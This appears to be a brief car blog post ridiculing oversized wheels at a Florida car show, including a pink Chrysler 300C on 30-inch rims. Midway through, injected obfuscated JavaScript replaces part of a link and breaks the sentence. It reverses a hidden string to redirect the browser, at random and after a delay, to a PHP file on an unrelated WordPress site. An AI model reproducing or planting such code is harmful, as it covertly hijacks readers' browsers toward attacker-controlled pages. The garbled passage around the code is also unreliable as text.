We know what you’re thinking: SEMA has really lost it this time. The hit and miss bumpers and comme ce comme ca rear wings have taken a back seat in favour of redonkulously sized alloy wheels.
Not quite. The eyesore, sorry, examples you see are actually part of Florida’s Riding Big Car Show. This shock pink Chrysler 300C (continuing the subtlety of the event) for instance is rolling on 30-inch wheels. And we’ve only seen $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/hummer-h2-dubai-uae-when-enough-is-enough/” target=”_blank”>one other example like that recently.
Just goes to show that bigger is not always better.